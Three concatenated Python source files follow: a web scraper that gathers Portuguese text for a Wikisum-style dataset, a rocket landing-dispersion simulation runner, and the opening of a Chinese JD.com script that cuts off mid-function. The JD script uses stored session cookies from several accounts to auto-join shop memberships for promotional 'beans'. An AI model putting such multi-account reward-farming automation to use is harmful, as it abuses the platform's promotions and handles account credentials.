inputs_to_store = queue.Queue()
text_maker = html2text.HTML2Text()
text_maker.ignore_links = True
text_maker.ignore_tables = True
text_maker.ignore_images = True
text_maker.ignore_anchors = True
text_maker.ignore_emphasis = True
text_maker.body_width = 0
def drain(q):
while True:
try:
yield q.get_nowait()
except queue.Empty: # on python 2 use Queue.Empty
break
def bsoup_parse(html):
soup = BeautifulSoup(html, features="html.parser")
# kill all script and style elements
for script in soup(["script", "style"]):
script.extract() # rip it out
# get text
text = soup.get_text()
# break into lines and remove leading and trailing space on each
lines = (line.strip() for line in text.splitlines())
# break multi-headlines into a line each
chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
# drop blank lines
text = '\n'.join(chunk for chunk in chunks if chunk)
return text
def html2text_parse(html):
text = text_maker.handle(html)
return text
# Peguei do Wikisum: https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/data_generators/wikisum/utils.py
_SOME_ALPHA_RE = re.compile(r'[A-Za-z]+')
_ONLY_ALPHA_RE = re.compile(r'^[A-Za-z]*$')
def filter_paragraph(p):
"""Simple filter to remove obviously bad paragraphs (bad text extraction).
Note this needs to run very quickly as it is applied to every paragraph
in the corpus, so nothing fancy! This whole method should be linear
expected time in len(p).
Args:
p: string, paragraph
Returns:
True if we should remove the paragraph.
"""
# creating a space between a word and the punctuation following it
# eg: "he is a boy." => "he is a boy .
p = re.sub(r"([?.!,¿])", r" \1 ", p)
p = re.sub(r'[" "]+', " ", p)
# substituir tudo por espaço exceto (a-z, A-Z, ".", "?", "!", ",", letras com acentos da lingua pt)
p = re.sub(r"[^a-zA-ZçÇéêíáâãõôóúûÉÊÍÁÂÃÕÔÓÚÛ?.!,()0-9]+", " ", p).lower()
# e depois colocar em caixa baixa
p = p.strip()
# Expect a minimum number of words.
tokens = p.split()
if len(tokens) < 6:
#print(tokens, 'aqui')
return True, p
# Require some letters.
if not re.search(_SOME_ALPHA_RE, p):
#print(tokens, 'aqui1')
return True, p
# Keep this one at the end, probably the most complicated logic.
# We try to detect sentences, which should have a minimum of 3 tokens
# with only alphabetic characters.
last = 0
found_sentence = False
num_alpha = 0
for i, x in enumerate(tokens):
if x == '.':
if i - last > 3 and num_alpha >= 3:
found_sentence = True
break
last = i
num_alpha = 0
if re.match(_ONLY_ALPHA_RE, x):
#print('OIOIOIO')
num_alpha += 1
if not found_sentence:
#print(tokens, 'aqui2')
return True, p
#print(tokens, 'aqui3')
return False, p
def detect_clone(text, article_sections):
text_tokens = word_tokenize(text)
for section in article_sections:
if(len(section)>0):
section_tokens = word_tokenize(section.lower())
#print(list(section_unigrams))
count_intersection = len(set(section_tokens) & set(text_tokens))
clone_prob = float(count_intersection)/len(section_tokens)
#print(count_intersection, len(section_tokens), len(text_tokens), clone_prob)
if(clone_prob > 0.5):
#print(section, text)
return True
return False
def get_page_text(url, article_sections=None):
to_save = []
try:
url_fetch = urlopen(url, timeout=3)
url_bytes = url_fetch.read()
html_str = url_bytes#.decode("utf-8")
text = bsoup_parse(html_str)
if article_sections != None:
if detect_clone(text, article_sections):
return to_save
paragraphs = text.split('\n')
for paragraph in paragraphs:
not_good, processed_para = filter_paragraph(paragraph)
if not not_good:
lang = detect(processed_para)
if(lang == 'pt'):
to_save.append(processed_para)
except Exception as e:
pass
finally:
return to_save
def worker():
while True:
item = q.get()
url = item[0]
article_sections = item[1]
extension = url.split('.')[-1]
article_id = item[2]
article_title = item[3]
article_sections_titles = item[4]
try:
#print("Working on {}".format(item))
# time.sleep(random.randint(1, 4)) # simulando tempo
#print(extension)
if(extension not in ['pdf', 'mp3', 'mp4', 'zip']):
paragraphs = get_page_text(url, article_sections)
#print(paragraphs)
if(len(paragraphs) != 0):
inputs_to_store.put([article_id, article_title, article_sections_titles, article_sections, paragraphs])
#print([item, paragraphs])
#print(f'Finished {item}')
except Exception as e:
#print(e)
pass
finally:
q.task_done()
def get_articles_urls(urls_file, out_file):
already_done_articles = 0
try:
with open(out_file, 'r') as file:
for line in file:
article = json.loads(line)
if(int(article['id']) > already_done_articles):
already_done_articles = int(article['id'])
#already_done_articles.append(article['id'])
except:
pass
docs = []
print('Loading articles')
with open(urls_file, 'r') as file:
for line in file:
#print('{}/{}'.format(i, 105695))
attrib = json.loads(line)
article_id = attrib['id']
article_title = attrib['title']
if(int(article_id) > already_done_articles):
article_urls = attrib['urls']
article_n_urls = attrib['n_urls']
docs.append([article_id, article_title, article_n_urls, article_urls])
return docs
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def find_article_text(input_path, article_id):
article_text = []
article_sections_titles = []
for file_dir in ['AB/', 'AA/']:
for i in range(99, -1, -1):
file_name = '{}{}processed_wiki_{:02d}.json'.format(input_path, file_dir, i)
try:
with open(file_name, 'r') as file:
first_article = json.loads(file.readline())
if(int(article_id) < int(first_article['id'])):
continue
elif(int(article_id) == int(first_article['id'])):
article_text = first_article['text']
article_sections_titles = first_article['sections']
break
else:
for line in file:
new_article = json.loads(line)
if(int(article_id) == int(new_article['id'])):
article_text = new_article['text']
article_sections_titles = new_article['sections']
break
except:
pass
return article_text, article_sections_titles
def persist_data(item, file):
to_out = json.dumps(item, ensure_ascii=False).encode('utf-8')+'\n'.encode('utf-8')
file.write(to_out)
#for item in itens_dict:
# print(itens_dict)
def _bytes_feature(value):
"""Returns a bytes_list from a string / byte."""
if isinstance(value, type(tf.constant(0))):
value = value.numpy() # BytesList won't unpack a string from an EagerTensor.
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def serialize_str_list(item_list):
str_list = ""
i = 0
for item in item_list:
if(i == 0):
str_list = item
else:
str_list = str_list + "[sep]" + item
i = i + 1
return str_list.encode('utf-8')
def serialize_example(article_id, title, section_titles, section_texts, web_paragraphs):
"""
Creates a tf.train.Example message ready to be written to a file.
"""
# Create a dictionary mapping the feature name to the tf.train.Example-compatible
# data type.
feature = {
'id': _bytes_feature(article_id.encode('utf-8')),
'title': _bytes_feature(title.encode('utf-8')),
'section_titles': _bytes_feature(serialize_str_list(section_titles)),
'section_texts': _bytes_feature(serialize_str_list(section_texts)),
'web_paragraphs' : _bytes_feature(serialize_str_list(web_paragraphs))
}
# Create a Features message using tf.train.Example.
example_proto = tf.train.Example(features=tf.train.Features(feature=feature))
return example_proto.SerializeToString()
def tf_write(item, file_path):
with tf.io.TFRecordWriter(file_path) as writer:
example = serialize_example(item[0], item[1], item[2], item[3], item[4])
writer.write(example)
def check_url(url_str):
forbiden_strs = ['google', 'wikipedia', 'wikimedia', 'youtube', 'PDF', 'pdf', 'ftp', 'FTP', 'xls']
for forbiden in forbiden_strs:
if forbiden in url_str:
return False
return True
def main(args):
urls_file = '{}{}'.format(args.urls_path, args.urls_file)
output_file1 = '{}{}-WEB'.format(args.output_path, args.urls_file)
#output_file1 = '{}{}.tfrecord'.format(args.output_path, args.urls_file)
output_file2 = '{}{}-WIKI'.format(args.output_path, args.urls_file)
#print(shard_urls_file, shard_content_file)
total_start = time.time()
wiki_articles = get_articles_urls(urls_file, output_file1)
n_chunks = int(len(wiki_articles)/args.batch_size + 0.5)
i = 1
for batch in chunks(wiki_articles, args.batch_size):
start = time.time()
for article in batch:
article_id = article[0]
article_title = article[1]
n_urls = article[2]
wiki_urls = article[3]
#print(article_id)
article_sections, article_sections_titles = find_article_text(args.wiki_articles_path, article_id)
#print(len(article_sections))
if(len(article_sections) > 0):
# send thirty task requests to the worker
actual_n_urls = 0
for url in wiki_urls:
if(check_url(url)):
actual_n_urls = actual_n_urls + 1
q.put([url, article_sections, article_id, article_title, article_sections_titles])
print("Processing {}".format(article_title))
print("Sending {:d} URLs to workers".format(actual_n_urls))
# block until all tasks are done
#print(q.qsize())
q.join()
#print('aaa')
#print(inputs_to_store.qsize())
#web_paragraphs = []
if(inputs_to_store.qsize() != 0):
to_outs1 = {}
to_outs2 = {}
for url_data in drain(inputs_to_store):
article_id = url_data[0]
article_title = url_data[1]
article_sections_titles = url_data[2]
article_sections = url_data[3]
url_paragraphs = url_data[4]
if(article_id not in to_outs1):
to_outs1[article_id] = {'id' : article_id, 'title' : article_title, 'web_paragraphs' : []}
to_outs2[article_id] = {'id' : article_id, 'title' : article_title, 'sections_titles': article_sections_titles, 'sections_texts' : article_sections}
to_outs1[article_id]['web_paragraphs'] = to_outs1[article_id]['web_paragraphs'] + url_paragraphs
with open(output_file1, "ab+") as file1:
with open(output_file2, "ab+") as file2:
for article_id in to_outs1:
web_data = to_outs1[article_id]
wiki_data = to_outs2[article_id]
if(len(web_data['web_paragraphs']) >= 10):
#web_paragraphs = web_paragraphs + paragraphs
persist_data(web_data, file1)
persist_data(wiki_data, file2)
#tf_write([article_id, article_title, article_sections_titles, article_sections, web_paragraphs], output_file1)
end = time.time()
print('{:d}/{:d} completed in {:.2f} seconds.'.format(i, n_chunks, (end-start)))
i = i + 1
total_end = time.time()
print('File {} - FINAL TIME: {:.2f}'.format(args.urls_file, (total_end-total_start)))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generate Wikisum dataset from given URLs and Wikipedia descriptions.')
parser.add_argument('--workers', help='number of threads to perform web searchs in parallel', default=1, type=int)
parser.add_argument('--batch_size', help='batch of articles between storages', default=10, type=int)
parser.add_argument('--urls_path', default='wiki_urls_refs/', type=str)
parser.add_argument('--wiki_articles_path', default='processed_wikiextractor/', type=str)
parser.add_argument('--urls_file', default='p1p105695.json', type=str)
parser.add_argument('--output_path', default='processed_examples/pt_en_v2/', type=str)
args = parser.parse_args()
# turn-on the worker thread
for i in range(args.workers):
threading.Thread(target=worker, daemon=True).start()
main(args)
|
run_loop.py
|
import rocketsimu.simulator as simu
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import argparse
import multiprocessing
import os
import json
import numpy as np
import pandas as pd
import quaternion
from lib import kmlplot
from lib.numpy2json import NumpyEncoder
def run_simu(params, idx, foldername='tmp'):
print(f'[PID:{os.getpid()}] Start')
# シミュレーション
t, x, v, q, omega, log = simu.simulate(params, cons_out=False)
print(f'[PID:{os.getpid()}] landing XYZ:', log['landing']['x'])
log.update({'loop_id': idx})
with open(os.path.join(foldername, str(idx)+'.json'), 'w') as f:
json.dump(log, f, indent=2, cls=NumpyEncoder)
# 結果を弾道履歴表(csv), パラメータ(json), 特異点ログ(json)に分けてファイル出力
# q_float = quaternion.as_float_array(q)
trajectory = {
't': t,
'x': x[0],
'y': x[1],
'z': x[2],
'vx': v[0],
'vy': v[1],
'vz': v[2],
'qx': q[0],
'qy': q[1],
'qz': q[2],
'qw': q[3],
'wx': omega[0],
'wy': omega[1],
'wz': omega[2]
}
df = pd.DataFrame(trajectory)
df = df.set_index('t')
df.to_csv(os.path.join(foldername, str(idx)+'.csv')) #弾道表
print(f'[PID:{os.getpid()}] End')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("config", help="Parameter file path(json format)")
parser.add_argument("azimuth", help="Number of azimuth of wind")
parser.add_argument("speed", help="range of speed of wind. [start:end:step] i.e: [0:8:1]")
parser.add_argument("out", help="output directory")
parser.add_argument("-k", "--kml", help="kml filename")
parser.add_argument("-p", "--process", help="max number of processes to be used. laptop:4~8, desktop:8~16")
args = parser.parse_args()
# パラメータ読み込み
print('Parmeter file:', args.config)
with open(args.config) as f:
params = json.load(f)
# 出力先フォルダを作成
if not os.path.exists(args.out):
print('output directory:', args.out, 'was not found -> creating..')
os.makedirs(args.out)
# 出力フォルダにパラメータを保存
with open(os.path.join(args.out, 'param_origin.json'), 'w') as f:
json.dump(params, f, indent=2)
# プロセス数
if args.process:
n_process = int(args.process)
else:
n_process = 1
azimuth_array = np.linspace(0, 2*np.pi, int(args.azimuth), endpoint=False)
speed_range = np.array(args.speed.split(':'), dtype='int32')
speed_array = np.arange(speed_range[0], speed_range[1], speed_range[2])
print('azimuth arrray: ', azimuth_array)
print('speed array:', speed_array)
proc = []
idx = 0
for speed in speed_array:
# 風向ごとにプロセス並列化して処理(ノートPCでは他のソフトの処理が重くなります)
for azimuth in azimuth_array:
wind_std = [-speed * np.sin(azimuth), -speed * np.cos(azimuth), 0]
params['wind_parameters']['wind_std'] = wind_std
p = multiprocessing.Process(target=run_simu, args=(params, idx, args.out))
proc.append(p)
p.start()
idx += 1
# 終了したプロセスは削除
for i, _p in enumerate(proc):
if not _p.is_alive():
proc.pop(i)
# 使用プロセス数が上限に達したらプロセス終了を待つ
if len(proc) >= n_process:
# いずれかのプロセスの終了を待つ
loopf=True
while loopf:
for i, _p in enumerate(proc):
if not _p.is_alive():
proc.pop(i)
loopf=False
break
# 全プロセスの処理終了を待つ
for p in proc:
p.join()
proc = []
if args.kml:
# 伊豆レギュレーション情報読み出し
with open('location_parameters/izu.json') as f:
regulations = json.load(f)
idx=0
scatter = np.zeros((len(speed_array), len(azimuth_array)+1, 2))
for r, speed in enumerate(speed_array):
for theta, azimuth in enumerate(azimuth_array):
wind_std = [-speed * np.sin(azimuth), -speed * np.cos(azimuth), 0]
with open(os.path.join(args.out, str(idx)+'.json')) as f:
data = json.load(f)
scatter[r, theta] = np.array(data['landing']['x'])[:2]
idx += 1
scatter[r, -1] = scatter[r, 0] # 楕円の始端と終端を結ぶ
print('scatter:', scatter)
for item in regulations:
if item['name'] == 'rail':
latlon = item['center']
print('lat lon:', latlon)
kmlplot.output_kml(scatter, latlon, speed_array, regulations, os.path.join(args.out, args.kml))
|
jd_OpenCard.py
|
#!/bin/env python3
# -*- coding: utf-8 -*
'''
项目名称: JD_OpenCard
Author: Curtin
功能:JD入会开卡领取京豆
CreateDate: 2021/5/4 下午1:47
UpdateTime: 2021/6/19
建议cron: 2 8,15 * * * python3 jd_OpenCard.py
new Env('开卡有礼');
'''
version = 'v1.2.2'
readmes = """
# JD入会领豆小程序

## 使用方法
#### [手机用户(参考) https://mp.weixin.qq.com/s/ih6aOURXWM-iKrhvMyR3mw](https://mp.weixin.qq.com/s/ih6aOURXWM-iKrhvMyR3mw)
#### [PC用户 (参考) https://mp.weixin.qq.com/s/JmLxAecZAlEc4L2sZWnn1A](https://mp.weixin.qq.com/s/JmLxAecZAlEc4L2sZWnn1A)
#### [v4-bot用户 (参考) https://github.com/curtinlv/JD-Script/pull/12#issue-652134788](https://github.com/curtinlv/JD-Script/pull/12#issue-652134788)
## 目录结构
JD-Script/ #仓库
|-- LICENSE
|-- OpenCard # 主目录
| |-- jd_OpenCard.py # 主代码 (必要)
| |-- log # 临时目录(可删除)
| |-- OpenCardConfig.ini # 只配置文件(必要)
| |-- Readme.md # 说明书
| `-- start.sh # shell脚本(非必要)
`-- README.md
log目录结构、临时目录(可删除):
log
├── memory.json # 记忆、统计功能临时存放参数
├── shopid-2021-05-23.txt # 记录所有送豆的shopid
├── 入会N豆以上的shopid-2021-05-23.txt # 记录满足入会条件的shopid
├── 入会汇总.txt # 记录所有入会店铺送豆的加入、注销链接
├── 可退会账号【账号id】.txt # 记录跑脚本之前已经过入会且目前送豆的注销链接(可优先退会)
### `【兼容环境】`
1.Python3.3+ 环境
2.兼容ios设备软件:Pythonista 3、Pyto(已测试正常跑,其他软件自行测试)
3.Windows exe
安装依赖模块 :
pip3 install requests
执行:
python3 jd_OpenCard.py
start.sh 脚本运行方法:
1.适合定时任务或不想依赖ini配置文件。
2.支持单号跑多开,如
cp start.sh start_2.sh
sh start_2.sh #只跑里面配置的参数,如cookie
3.定时任务(参考):
0 8 * * * sh /home/curtin/JD-Script/OpenCard/start.sh
2 8 * * * sh /home/curtin/JD-Script/OpenCard/start_2.sh
## `【更新记录】`
2021.6.19: (v1.2.2)
* 修复多线程报错
2021.6.14: (v1.2.1)
* 新增单双线程控制
* 修复一些问题,如腾讯云跑异常报错。
2021.5.28:(v1.2.0)
* 新增单或多账号并发
- Concurrent=yes #开启
* 新增企业微信、Bark推送
* 优化一些逻辑
- 如随机账号查询礼包,仅开启单账号时候
- 京豆统计
2021.5.23:(v1.1.1)
* 修复一些问题及优化一些代码
* 修复Env环境读取变量问题
* 新增 start.sh 运行脚本(可Env环境使用)
- 运行方式 sh start.sh
2021.5.21:(v1.1.0)
* 修复一些问题及优化一些代码:
- 修复最后统计显示为0,新增开卡个数统计
- 修复记忆功能一些bug
- 等等一些小问题
* 新增机器人通知
- 开启远程shopid、配合crontab 坐等收豆
2021.5.15:(v1.0.5)
* 新增远程获取shopid功能
- isRemoteSid=yes #开启
* 修改已知Bug
2021.5.9:(v1.0.4 Beta)
* 优化代码逻辑
* 打包exe版本测试
2021.5.8:(v1.0.3)
* 优化记忆功能逻辑:
- cookiek个数检测
- shopid个数检测
- 上一次中断最后记录的账号id检测不存在本次ck里面
- 临时文件log/memory.json是否存在
- 以上任意一条命中则记忆接力功能不生效。
2021.5.7:(v1.0.2)
* 优化代码逻辑
* 修复已知Bug
2021.5.5:(v1.0.1)
* 新增记忆功能,如中断后下次跑会接着力跑(默认开启)
- memory= True
* 新增仅记录shopid,不入会功能(默认关闭)
- onlyRecord = no
* 修复已知Bug
2021.5.4:(v1.0.0)
* 支持多账号
- JD_COOKIE=pt_key=xxx;pt_pin=xxx;&pt_key=xxx;pt_pin=xxx; #多账号&分隔
* 限制京豆数量入会,例如只入50豆以上
- openCardBean = 50
* 双线程运行
- 默认开启,且您没得选择。
* 记录满足条件的shopid 【record= True】默认开启 (./log 目录可删除)
- log/可销卡汇总.txt #记录开卡送豆的店铺销卡链接
- log/shopid-yyyy-mm-dd.txt #记录当天所有入会送豆的shopid
- log/可销卡账号xxx.txt #记录账号可销卡的店铺
### `【账号参数配置说明】`
### 主配置文件[ OpenCardConfig.ini ] 请保持utf-8默认格式
变量 | 值 | 说明
---- | ----- | ------
JD_COOKIE | pt_key=xxx;pt_pin=xxx; | 必要(多账号&分隔)
openCardBean | 30 | int,入会送豆满足此值,否则不入会
record | False或True | 布尔值,是否记录符合条件的shopid(默认True)
onlyRecord | False或True |布尔值, True:仅记录,不入会(默认False)
memory | False或True | 布尔值,开启记忆功能,接力上一次异常中断位置继续。(默认yes)
printlog | False或True | 布尔值,True:只打印部分日志 False:打印所有日志
sleepNum | False或True | Float,限制速度,单位秒,如果请求过快报错适当调整0.5秒以上
isRemoteSid | False或True | 布尔值,True:使用作者远程仓库更新的id,False:使用本地shopid.txt的id
#### 兼容Env环境(如有配置则优先使用,适合AC、云服务环境等)
export JD_COOKIE='pt_key=xxx;pt_pin=xxx;' (多账号&分隔)
export openCardBean=30
export xxx=xxx
#### Ps:您可以到以下途径获取最新的shopid.txt,定期更新:
###### [GitHub仓库 https://github.com/curtinlv/JD-Script](https://github.com/curtinlv/JD-Script)
###### [Gitee仓库 https://gitee.com/curtinlv/JD-Script](https://gitee.com/curtinlv/JD-Script)
###### [TG频道 https://t.me/TopStyle2021](https://t.me/TopStyle2021)
###### [TG群 https://t.me/topStyle996](https://t.me/topStyle996)
###### 关注公众号【TopStyle】回复:shopid

#
@Last Version: %s
@Last Time: 2021-06-19 13:55
@Author: Curtin
#### **仅以学习交流为主,请勿商业用途、禁止违反国家法律 ,转载请留个名字,谢谢!**
# End.
[回到顶部](#readme)
""" % version
################################ 【Main】################################
import time, os, sys, datetime
import requests
import random, string
import re, json, base64
from urllib.parse import unquote, quote_plus
from threading import Thread
from configparser import RawConfigParser
# 定义一些要用到参数
requests.packages.urllib3.disable_warnings()
scriptHeader = """
════════════════════════════════════════
║ ║
║ JD 入 会 领 豆 ║
║ ║
════════════════════════════════════════
@Version: {}""".format(version)
remarks = '\n\n\tTG交流 : https://t.me/topstyle996\n\n\tTG频道 : https://t.me/TopStyle2021\n\n\t公众号 : TopStyle\n\n\t\t\t--By Curtin\n'
timestamp = int(round(time.time() * 1000))
today = datetime.datetime.now().strftime('%Y-%m-%d')
# 获取当前工作目录
pwd = os.path.dirname(os.path.abspath(__file__)) + os.sep
######
openCardBean = 0
sleepNum = 0.0
record = True
onlyRecord = False
memory = True
printlog = True
isRemoteSid = True
Concurrent = True
TG_BOT_TOKEN = ''
TG_USER_ID = ''
PUSH_PLUS_TOKEN = ''
TG_PROXY_IP = ''
TG_PROXY_PORT = ''
TG_API_HOST = ''
QYWX_AM = ''
BARK = ''
DoubleThread = True
# 获取账号参数
try:
configinfo = RawConfigParser()
try:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="UTF-8")
except Exception as e:
with open(pwd + "OpenCardConfig.ini", "r", encoding="UTF-8") as config:
getConfig = config.read().encode('utf-8').decode('utf-8-sig')
with open(pwd + "OpenCardConfig.ini", "w", encoding="UTF-8") as config:
config.write(getConfig)
try:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="UTF-8")
except:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="gbk")
cookies = configinfo.get('main', 'JD_COOKIE')
openCardBean = configinfo.getint('main', 'openCardBean')
sleepNum = configinfo.getfloat('main', 'sleepNum')
record = configinfo.getboolean('main', 'record')
onlyRecord = configinfo.getboolean('main', 'onlyRecord')
memory = configinfo.getboolean('main', 'memory')
printlog = configinfo.getboolean('main', 'printlog')
isRemoteSid = configinfo.getboolean('main', 'isRemoteSid')
TG_BOT_TOKEN = configinfo.get('main', 'TG_BOT_TOKEN')
TG_USER_ID = configinfo.get('main', 'TG_USER_ID')
PUSH_PLUS_TOKEN = configinfo.get('main', 'PUSH_PLUS_TOKEN')
TG_PROXY_IP = configinfo.get('main', 'TG_PROXY_IP')
TG_PROXY_PORT = configinfo.get('main', 'TG_PROXY_PORT')
TG_API_HOST = configinfo.get('main', 'TG_API_HOST')
QYWX_AM = configinfo.get('main', 'QYWX_AM')
Concurrent = configinfo.getboolean('main', 'Concurrent')
DoubleThread = configinfo.getboolean('main', 'DoubleThread')
BARK = configinfo.get('main', 'BARK')
except Exception as e:
OpenCardConfigLabel = 1
print("参数配置有误,请检查OpenCardConfig.ini\nError:", e)
print("尝试从Env环境获取!")
def getBool(label):
try:
if label == 'True' or label == 'yes' or label == 'true' or label == 'Yes':
return True
elif label == 'False' or label == 'no' or label == 'false' or label == 'No':
return False
else:
return True
except Exception as e:
print(e)
# 获取系统ENV环境参数优先使用 适合Ac、云服务等环境
# JD_COOKIE=cookie (多账号&分隔)
if "JD_COOKIE" in os.environ:
if len(os.environ["JD_COOKIE"]) > 10:
cookies = os.environ["JD_COOKIE"]
print("已获取并使用Env环境 Cookie")
# 只入送豆数量大于此值
if "openCardBean" in os.environ:
if len(os.environ["openCardBean"]) > 0:
openCardBean = int(os.environ["openCardBean"])
print("已获取并使用Env环境 openCardBean:", openCardBean)
elif not openCardBean:
openCardBean = 0
# 是否开启双线程
if "DoubleThread" in os.environ:
if len(os.environ["DoubleThread"]) > 1:
DoubleThread = getBool(os.environ["DoubleThread"])
print("已获取并使用Env环境 DoubleThread", DoubleThread)
# 多账号并发
if "Concurrent" in os.environ:
if len(os.environ["Concurrent"]) > 1:
Concurrent = getBool(os.environ["Concurrent"])
print("已获取并使用Env环境 Concurrent", Concurrent)
elif not Concurrent:
Concurrent = True
# 限制速度,单位秒,如果请求过快报错适当调整0.5秒以上
if "sleepNum" in os.environ:
if len(os.environ["sleepNum"]) > 0:
sleepNum = float(os.environ["sleepNum"])
print("已获取并使用Env环境 sleepNum:", sleepNum)
elif not sleepNum:
sleepNum = 0
if "printlog" in os.environ:
if len(os.environ["printlog"]) > 1:
printlog = getBool(os.environ["printlog"])
print("已获取并使用Env环境 printlog:", printlog)
elif not printlog:
printlog = True
# 是否记录符合条件的shopid,输出文件【OpenCardlog/yes_shopid.txt】 False|True
if "record" in os.environ:
if len(os.environ["record"]) > 1:
record = getBool(os.environ["record"])
print("已获取并使用Env环境 record:", record)
elif not record:
record = True
# 仅记录,不入会。入会有豆的shopid输出文件
if "onlyRecord" in os.environ:
if len(os.environ["onlyRecord"]) > 1:
onlyRecord = getBool(os.environ["onlyRecord"])
print("已获取并使用Env环境 onlyRecord:", onlyRecord)
elif not onlyRecord:
onlyRecord = False
# 开启记忆, 需要record=True且 memory= True 才生效
if "memory" in os.environ:
if len(os.environ["memory"]) > 1:
memory = getBool(os.environ["memory"])
print("已获取并使用Env环境 memory:", memory)
elif not memory:
memory = True
# 是否启用远程shopid
if "isRemoteSid" in os.environ:
if len(os.environ["isRemoteSid"]) > 1:
isRemoteSid = getBool(os.environ["isRemoteSid"])
print("已获取并使用Env环境 isRemoteSid:", isRemoteSid)
elif not isRemoteSid:
isRemoteSid = True
# 获取TG_BOT_TOKEN
if "TG_BOT_TOKEN" in os.environ:
if len(os.environ["TG_BOT_TOKEN"]) > 1:
TG_BOT_TOKEN = os.environ["TG_BOT_TOKEN"]
print("已获取并使用Env环境 TG_BOT_TOKEN")
# 获取TG_USER_ID
if "TG_USER_ID" in os.environ:
if len(os.environ["TG_USER_ID"]) > 1:
TG_USER_ID = os.environ["TG_USER_ID"]
print("已获取并使用Env环境 TG_USER_ID")
# 获取代理ip
if "TG_PROXY_IP" in os.environ:
if len(os.environ["TG_PROXY_IP"]) > 1:
TG_PROXY_IP = os.environ["TG_PROXY_IP"]
print("已获取并使用Env环境 TG_PROXY_IP")
# 获取TG 代理端口
if "TG_PROXY_PORT" in os.environ:
if len(os.environ["TG_PROXY_PORT"]) > 1:
TG_PROXY_PORT = os.environ["TG_PROXY_PORT"]
print("已获取并使用Env环境 TG_PROXY_PORT")
elif not TG_PROXY_PORT:
TG_PROXY_PORT = ''
# 获取TG TG_API_HOST
if "TG_API_HOST" in os.environ:
if len(os.environ["TG_API_HOST"]) > 1:
TG_API_HOST = os.environ["TG_API_HOST"]
print("已获取并使用Env环境 TG_API_HOST")
# 获取pushplus+ PUSH_PLUS_TOKEN
if "PUSH_PLUS_TOKEN" in os.environ:
if len(os.environ["PUSH_PLUS_TOKEN"]) > 1:
PUSH_PLUS_TOKEN = os.environ["PUSH_PLUS_TOKEN"]
print("已获取并使用Env环境 PUSH_PLUS_TOKEN")
# 获取企业微信应用推送 QYWX_AM
if "QYWX_AM" in os.environ:
if len(os.environ["QYWX_AM"]) > 1:
QYWX_AM = os.environ["QYWX_AM"]
print("已获取并使用Env环境 QYWX_AM")
# 获取企业微信应用推送 QYWX_AM
if "BARK" in os.environ:
if len(os.environ["BARK"]) > 1:
BARK = os.environ["BARK"]
print("已获取并使用Env环境 BARK")
# 判断参数是否存在
try:
cookies
except NameError as e:
var_exists = False
print("[OpenCardConfig.ini] 和 [Env环境] 都无法获取到您的cookies,请配置!\nError:", e)
time.sleep(60)
exit(1)
else:
var_exists = True
# 创建临时目录
if not os.path.exists(pwd + "log"):
os.mkdir(pwd + "log")
# 记录功能json
memoryJson = {}
message_info = ''
notify_mode = []
################################### Function ################################
class TaskThread(Thread):
"""
处理task相关的线程类
"""
def __init__(self, func, args=()):
super(TaskThread, self).__init__()
self.func = func # 要执行的task类型
self.args = args # 要传入的参数
def run(self):
self.result = self.func(*self.args) # 将任务执行结果赋值给self.result变量
def get_result(self):
# 改方法返回task函数的执行结果,方法名不是非要get_result
try:
return self.result
except Exception as ex:
print(ex)
return "ERROR"
def nowtime():
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
def printinfo(context, label: bool):
if label == False:
print(context)
def exitCodeFun(code):
try:
if sys.platform == 'win32' or sys.platform == 'cygwin':
print("连按回车键即可退出窗口!")
exitCode = input()
exit(code)
except:
time.sleep(3)
exit(code)
def message(str_msg):
global message_info
print(str_msg)
message_info = "{}\n{}".format(message_info, str_msg)
sys.stdout.flush()
# 获取通知,
if PUSH_PLUS_TOKEN:
notify_mode.append('pushplus')
if TG_BOT_TOKEN and TG_USER_ID:
notify_mode.append('telegram_bot')
if QYWX_AM:
notify_mode.append('wecom_app')
if BARK:
notify_mode.append('bark')
# tg通知
def telegram_bot(title, content):
try:
print("\n")
bot_token = TG_BOT_TOKEN
user_id = TG_USER_ID
if not bot_token or not user_id:
print("tg服务的bot_token或者user_id未设置!!\n取消推送")
return
print("tg服务启动")
if TG_API_HOST:
if 'http' in TG_API_HOST:
url = f"{TG_API_HOST}/bot{TG_BOT_TOKEN}/sendMessage"
else:
url = f"https://{TG_API_HOST}/bot{TG_BOT_TOKEN}/sendMessage"
else:
url = f"https://api.telegram.org/bot{TG_BOT_TOKEN}/sendMessage"
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payload = {'chat_id': str(TG_USER_ID), 'text': f'{title}\n\n{content}', 'disable_web_page_preview': 'true'}
proxies = None
if TG_PROXY_IP and TG_PROXY_PORT:
proxyStr = "http://{}:{}".format(TG_PROXY_IP, TG_PROXY_PORT)
proxies = {"http": proxyStr, "https": proxyStr}
try:
response = requests.post(url=url, headers=headers, params=payload, proxies=proxies).json()
except:
print('推送失败!')
if response['ok']:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
# push推送
def pushplus_bot(title, content):
try:
print("\n")
if not PUSH_PLUS_TOKEN:
print("PUSHPLUS服务的token未设置!!\n取消推送")
return
print("PUSHPLUS服务启动")
url = 'http://www.pushplus.plus/send'
data = {
"token": PUSH_PLUS_TOKEN,
"title": title,
"content": content
}
body = json.dumps(data).encode(encoding='utf-8')
headers = {'Content-Type': 'application/json'}
response = requests.post(url=url, data=body, headers=headers).json()
if response['code'] == 200:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
# BARK
def bark_push(title, content):
print("\n")
if not BARK:
print("bark服务的bark_token未设置!!\n取消推送")
return
print("bark服务启动")
try:
response = requests.get('''https://api.day.app/{0}/{1}/{2}'''.format(BARK, title, quote_plus(content))).json()
if response['code'] == 200:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
print('Bark推送失败!')
def send(title, content):
"""
使用 bark, telegram bot, dingding bot, serverJ 发送手机推送
:param title:
:param content:
:return:
"""
content = content + "\n\n" + footer
for i in notify_mode:
if i == 'telegram_bot':
